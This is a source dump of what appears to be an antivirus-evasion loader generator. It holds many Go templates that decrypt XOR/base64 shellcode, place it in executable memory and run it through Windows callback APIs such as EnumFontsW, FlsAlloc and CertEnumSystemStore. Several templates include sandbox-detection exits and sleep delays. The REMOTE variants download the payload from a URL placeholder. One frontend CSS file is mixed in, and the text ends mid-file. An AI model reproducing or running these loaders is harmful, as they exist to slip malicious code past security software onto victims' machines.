-------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | RESOURCE_ENUM_VALIDATE = 0x0008 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 27 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | 35 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 36 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 37 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext := []byte{{{Shellcode}}} 64 | byteData := DecryptData(ciphertext) 65 | Callback(byteData) 66 | } 67 | -------------------------------------------------------------------------------- /template/go/go_VirtualAlloc/xor/REMOTE/go_VirtualAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import( 4 | "golang.org/x/sys/windows" 5 | "time" 6 | "unsafe" 7 | "math/rand" 8 | "os" 9 | "github.com/valyala/fasthttp" 10 | "syscall" 11 | ) 12 | 13 | func XorDecrypt(plaintext []byte, key []byte) []byte { 14 | ciphertext := make([]byte, len(plaintext)) 15 | keyLength := len(key) 16 | for i, byte := range plaintext { 17 | keyByte := key[i % keyLength] 18 | encryptedByte := byte ^ keyByte 19 | ciphertext[i] = encryptedByte 20 | } 21 | return ciphertext 22 | } 23 | 24 | func DecryptData(v2 []byte) []byte { 25 | key := []byte{{{Key}}} 26 | v222 := XorDecrypt(v2, key) 27 | return v222 28 | } 29 | 30 | func WriteMemory(inbuf []byte, destination uintptr) { 31 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 32 | writePtr := unsafe.Pointer(destination + uintptr(index)) 33 | v := (*byte)(writePtr) 34 | *v = inbuf[index] 35 | } 36 | } 37 | 38 | func Ldr1(calc []byte) { 39 | 40 | mKernel32, _ := syscall.LoadDLL("kernel32.dll") 41 | fVirtualAlloc, _ := mKernel32.FindProc("VirtualAlloc") 42 | calc_len := uintptr(len(calc)) 43 | Ptr1, _, _ := fVirtualAlloc.Call(uintptr(0), calc_len, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) 44 | WriteMemory(calc, Ptr1) 45 | syscall.SyscallN(Ptr1, 0, 0, 0, 0) 46 | } 47 | 48 | func Sleeeep() { 49 | res := 1 50 | for i := 0; i < 5; i++ { 51 | number := rand.Intn(900) + 100 52 | res *= number 53 | } 54 | time.Sleep(10 * time.Second) 55 | } 56 | 57 | 58 | func fetchShellcode() []byte { 59 | 60 | url := "{{REMOTE_URL}}" 61 | 62 | _, body, _ := fasthttp.Get(nil, url) 63 | 64 | return body 65 | } 66 | 67 | func main() { 68 | 69 | args := os.Args[0] 70 | if (args[10] == 92 && (args[0] == 99 || args[0] == 67)) { 71 | os.Exit(0) 72 | } 73 | 74 | Sleeeep() 75 | 76 | ciphertext := fetchShellcode() 77 | Sleeeep() 78 | byteData := DecryptData(ciphertext) 79 | 80 | Ldr1(byteData) 81 | 82 | } -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/base64Xor/LOCAL/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | if1 [0]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 23 | ntdll = syscall.NewLazyDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | FlsAlloc = kernel32.NewProc("FlsAlloc") 27 | FlsSetValue = kernel32.NewProc("FlsSetValue") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | dIndex, _, _ := FlsAlloc.Call(addr) 35 | dummy, _ := syscall.UTF16PtrFromString("dummy") 36 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 37 | } 38 | 39 | func XorDecrypt(plaintext []byte, key []byte) []byte { 40 | ciphertext := make([]byte, len(plaintext)) 41 | keyLength := len(key) 42 | for i, byte := range plaintext { 43 | keyByte := key[i%keyLength] 44 | encryptedByte := byte ^ keyByte 45 | ciphertext[i] = encryptedByte 46 | } 47 | return ciphertext 48 | } 49 | 50 | func DecryptData(v2 string) []byte { 51 | key := []byte{{{Key}}} 52 | v22, _ := base64.StdEncoding.DecodeString(v2) 53 | v222 := XorDecrypt(v22, key) 54 | return v222 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 64 | if err != nil { 65 | return 66 | } 67 | byteData := DecryptData(string(ciphertext)) 68 | Callback(byteData) 69 | } 70 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/xor/REMOTE/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | timer int 13 | dummy [522]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | User32 = syscall.NewLazyDLL("User32.dll") 27 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | GetDC = User32.NewProc("GetDC") 30 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 31 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | dc, _, _ := GetDC.Call(NULL) 38 | EnumFontsW.Call(dc, NULL, addr, NULL) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(shellcode []byte) []byte { 53 | key := []byte{{{Key}}} 54 | decryptShellcode := XorDecrypt(shellcode, key) 55 | return decryptShellcode 56 | } 57 | 58 | func fetchShellcode(url string) []byte { 59 | _, body, _ := fasthttp.Get(nil, url) 60 | return body 61 | } 62 | 63 | func main() { 64 | args := os.Args[0] 65 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 66 | os.Exit(0) 67 | } 68 | 69 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 70 | byteData := DecryptData(ciphertext) 71 | Callback(byteData) 72 | } 73 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/base64Xor/EMBEDDED/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | dummy [522]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | RESOURCE_ENUM_VALIDATE = 0x0008 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 28 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | 36 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 37 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 38 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := "{{Shellcode}}" 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_EnumChildWindows/base64Xor/LOCAL/go_EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | timer int 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | CAL_SMONTHNAME1 = 0x00000015 19 | ENUM_ALL_CALENDARS = 0xffffffff 20 | SORT_DEFAULT = 0x0 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 25 | ntdll = syscall.NewLazyDLL("ntdll.dll") 26 | User32 = syscall.NewLazyDLL("User32.dll") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | EnumChildWindows = User32.NewProc("EnumChildWindows") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | EnumChildWindows.Call(0, addr, 0) 39 | } 40 | 41 | func XorDecrypt(plaintext []byte, key []byte) []byte { 42 | ciphertext := make([]byte, len(plaintext)) 43 | keyLength := len(key) 44 | for i, byte := range plaintext { 45 | keyByte := key[i%keyLength] 46 | encryptedByte := byte ^ keyByte 47 | ciphertext[i] = encryptedByte 48 | } 49 | return ciphertext 50 | } 51 | 52 | func DecryptData(v2 string) []byte { 53 | key := []byte{{{Key}}} 54 | v22, _ := base64.StdEncoding.DecodeString(v2) 55 | v222 := XorDecrypt(v22, key) 56 | return v222 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 66 | if err != nil { 67 | return 68 | } 69 | byteData := DecryptData(string(ciphertext)) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /AVEvasionCraftOnline-Frontend/src/style.css: -------------------------------------------------------------------------------- 1 | :root { 2 | font-family: Inter, Avenir, Helvetica, Arial, sans-serif; 3 | font-size: 16px; 4 | line-height: 24px; 5 | font-weight: 400; 6 | 7 | color-scheme: light dark; 8 | color: rgba(255, 255, 255, 0.87); 9 | background-color: #242424; 10 | 11 | font-synthesis: none; 12 | text-rendering: optimizeLegibility; 13 | -webkit-font-smoothing: antialiased; 14 | -moz-osx-font-smoothing: grayscale; 15 | -webkit-text-size-adjust: 100%; 16 | 17 | /* 自定义 */ 18 | --color: #333333; 19 | --background-color: #f4f5f5; 20 | --bg-header: #ffffff; 21 | --header-text-color: #121212; 22 | } 23 | 24 | body { 25 | margin: 0; 26 | display: flex; 27 | place-items: center; 28 | min-width: 320px; 29 | min-height: 100vh; 30 | color: var(--color); 31 | background-color: var(--background-color); 32 | } 33 | 34 | a { 35 | font-weight: 500; 36 | color: #646cff; 37 | text-decoration: inherit; 38 | } 39 | a:hover { 40 | color: #535bf2; 41 | } 42 | /* #滚动条 43 | ================================================== */ 44 | ::-webkit-scrollbar { 45 | width: 0.35rem; 46 | height: 0.25rem; 47 | background-image: linear-gradient(#ffffff 100%, #ffffff 100%); 48 | } 49 | ::-webkit-scrollbar-track { 50 | border-radius: 0; 51 | } 52 | ::-webkit-scrollbar-thumb { 53 | background-image: linear-gradient(#3798e8 100%, #3798e8 100%); 54 | transition: all 0.2s; 55 | } 56 | ::-webkit-scrollbar-thumb:hover { 57 | background-color: rgba(95, 95, 95, 0.7); 58 | } 59 | 60 | /* #Element-PLus定制 61 | ================================================== */ 62 | 63 | /* #系统布局 64 | ================================================== */ 65 | 66 | #app { 67 | max-width: 1280px; 68 | margin: 0 auto; 69 | padding: 2rem; 70 | text-align: center; 71 | } 72 | 73 | @media (prefers-color-scheme: light) { 74 | :root { 75 | color: #213547; 76 | background-color: var(--background-color); 77 | } 78 | a:hover { 79 | color: #747bff; 80 | } 81 | button { 82 | background-color: #f9f9f9; 83 | } 84 | } 85 | -------------------------------------------------------------------------------- /template/go/go_CertEnumSystemStore/xor/REMOTE/go_CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | "golang.org/x/sys/windows" 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 20 | ntdll = syscall.NewLazyDLL("ntdll.dll") 21 | Crypt32 = syscall.NewLazyDLL("Crypt32.dll") 22 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 24 | CertEnumSystemStore = Crypt32.NewProc("CertEnumSystemStore") 25 | ) 26 | 27 | func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && err.Error() != "The operation completed successfully." { 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) 34 | 35 | } 36 | 37 | func XorDecrypt(plaintext []byte, key []byte) []byte { 38 | ciphertext := make([]byte, len(plaintext)) 39 | keyLength := len(key) 40 | for i, byte := range plaintext { 41 | keyByte := key[i%keyLength] 42 | encryptedByte := byte ^ keyByte 43 | ciphertext[i] = encryptedByte 44 | } 45 | return ciphertext 46 | } 47 | 48 | func DecryptData(shellcode []byte) []byte { 49 | key := []byte{{{Key}}} 50 | decryptShellcode := XorDecrypt(shellcode, key) 51 | return decryptShellcode 52 | } 53 | 54 | func fetchShellcode(url string) []byte { 55 | _, body, _ := fasthttp.Get(nil, url) 56 | return body 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_EnumResourceTypesExW/xor/LOCAL/go_EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | dummy [522]byte 12 | ) 13 | 14 | const ( 15 | MEM_COMMIT = 0x1000 16 | MEM_RESERVE = 0x2000 17 | PAGE_EXECUTE_READWRITE = 0x40 18 | NULL = 0 19 | RESOURCE_ENUM_VALIDATE = 0x0008 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | LoadLibraryW = kernel32.NewProc("LoadLibraryW") 27 | EnumResourceTypesExW = kernel32.NewProc("EnumResourceTypesExW") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | 35 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 36 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 37 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func main() { 58 | args := os.Args[0] 59 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 60 | os.Exit(0) 61 | } 62 | 63 | ciphertext, err := os.ReadFile("{{LOCAL_FILENAME}}") 64 | if err != nil { 65 | return 66 | } 67 | byteData := DecryptData(ciphertext) 68 | Callback(byteData) 69 | } 70 | -------------------------------------------------------------------------------- /template/go/go_SymEnumProcesses/xor/EMBEDDED/go_SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | FALSE = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 22 | ntdll = syscall.NewLazyDLL("ntdll.dll") 23 | Dbghelp = syscall.NewLazyDLL("Dbghelp.dll") 24 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 26 | SymInitialize = Dbghelp.NewProc("SymInitialize") 27 | SymEnumProcesses = Dbghelp.NewProc("SymEnumProcesses") 28 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | Proces, _, _ := GetCurrentProcess.Call() 38 | SymInitialize.Call(Proces, 0, FALSE) 39 | SymEnumProcesses.Call(addr, 0) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(shellcode []byte) []byte { 54 | key := []byte{{{Key}}} 55 | decryptShellcode := XorDecrypt(shellcode, key) 56 | return decryptShellcode 57 | } 58 | 59 | func main() { 60 | args := os.Args[0] 61 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 62 | os.Exit(0) 63 | } 64 | 65 | ciphertext := []byte{{{Shellcode}}} 66 | byteData := DecryptData(ciphertext) 67 | Callback(byteData) 68 | } 69 | -------------------------------------------------------------------------------- /template/go/go_FlsAlloc/xor/REMOTE/go_FlsAlloc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | 8 | "github.com/valyala/fasthttp" 9 | ) 10 | 11 | var ( 12 | if1 [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 24 | ntdll = syscall.NewLazyDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.NewProc("GetCurrentProcess") 27 | FlsAlloc = kernel32.NewProc("FlsAlloc") 28 | FlsSetValue = kernel32.NewProc("FlsSetValue") 29 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dIndex, _, _ := FlsAlloc.Call(addr) 36 | dummy, _ := syscall.UTF16PtrFromString("dummy") 37 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 38 | } 39 | 40 | func XorDecrypt(plaintext []byte, key []byte) []byte { 41 | ciphertext := make([]byte, len(plaintext)) 42 | keyLength := len(key) 43 | for i, byte := range plaintext { 44 | keyByte := key[i%keyLength] 45 | encryptedByte := byte ^ keyByte 46 | ciphertext[i] = encryptedByte 47 | } 48 | return ciphertext 49 | } 50 | 51 | func DecryptData(shellcode []byte) []byte { 52 | key := []byte{{{Key}}} 53 | decryptShellcode := XorDecrypt(shellcode, key) 54 | return decryptShellcode 55 | } 56 | 57 | func fetchShellcode(url string) []byte { 58 | _, body, _ := fasthttp.Get(nil, url) 59 | return body 60 | } 61 | 62 | func main() { 63 | args := os.Args[0] 64 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 65 | os.Exit(0) 66 | } 67 | 68 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 69 | byteData := DecryptData(ciphertext) 70 | Callback(byteData) 71 | } 72 | -------------------------------------------------------------------------------- /template/go/go_EnumFontsW/base64Xor/REMOTE/go_EnumFontsW.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | 9 | "github.com/valyala/fasthttp" 10 | ) 11 | 12 | var ( 13 | timer int 14 | dummy [522]byte 15 | ) 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 26 | ntdll = syscall.NewLazyDLL("ntdll.dll") 27 | User32 = syscall.NewLazyDLL("User32.dll") 28 | Gdi32 = syscall.NewLazyDLL("Gdi32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | GetDC = User32.NewProc("GetDC") 31 | EnumFontsW = Gdi32.NewProc("EnumFontsW") 32 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 33 | ) 34 | 35 | func Callback(shellcode []byte) { 36 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | dc, _, _ := GetDC.Call(NULL) 39 | EnumFontsW.Call(dc, NULL, addr, NULL) 40 | } 41 | 42 | func XorDecrypt(plaintext []byte, key []byte) []byte { 43 | ciphertext := make([]byte, len(plaintext)) 44 | keyLength := len(key) 45 | for i, byte := range plaintext { 46 | keyByte := key[i%keyLength] 47 | encryptedByte := byte ^ keyByte 48 | ciphertext[i] = encryptedByte 49 | } 50 | return ciphertext 51 | } 52 | 53 | func DecryptData(v2 string) []byte { 54 | key := []byte{{{Key}}} 55 | v22, _ := base64.StdEncoding.DecodeString(v2) 56 | v222 := XorDecrypt(v22, key) 57 | return v222 58 | } 59 | 60 | func fetchShellcode(url string) []byte { 61 | _, body, _ := fasthttp.Get(nil, url) 62 | return body 63 | } 64 | 65 | func main() { 66 | args := os.Args[0] 67 | if args[10] == 92 && (args[0] == 99 || args[0] == 67) { 68 | os.Exit(0) 69 | } 70 | 71 | ciphertext := fetchShellcode("{{REMOTE_URL}}") 72 | byteData := DecryptData(string(ciphertext)) 73 | Callback(byteData) 74 | } 75 | -------------------------------------------------------------------------------- /template/go/go_SetTimer/xor/EMBEDDED/go_SetTimer.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | g_InitOnce [0]byte 11 | lpContext [0]byte 12 | ) 13 | 14 | type MSG struct { 15 | } 16 | 17 | const ( 18 | MEM_COMMIT = 0x1000 19 | MEM_RESERVE = 0x2000 20 | PAGE_EXECUTE_READWRITE = 0x40 21 | NULL = 0 22 | dummy = 0 23 | ) 24 | 25 | var ( 26 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 27 | ntdll = syscall.NewLazyDLL("ntdll.dll") 28 | User32 = syscall.NewLazyDLL("User32.dll") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | SetTimer = User32.NewProc("SetTimer") 31 | GetMessageW = User32.NewProc("GetMessageW") 32 | DispatchMessageW = User32.NewProc("DispatchMessageW") 33 | RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") 34 | ) 35 | 36 | func Callback(shellcode []byte) { 37 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | msg := MSG{} 40 | SetTimer.Call(NULL, dummy, NULL, addr) 41 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 42 | 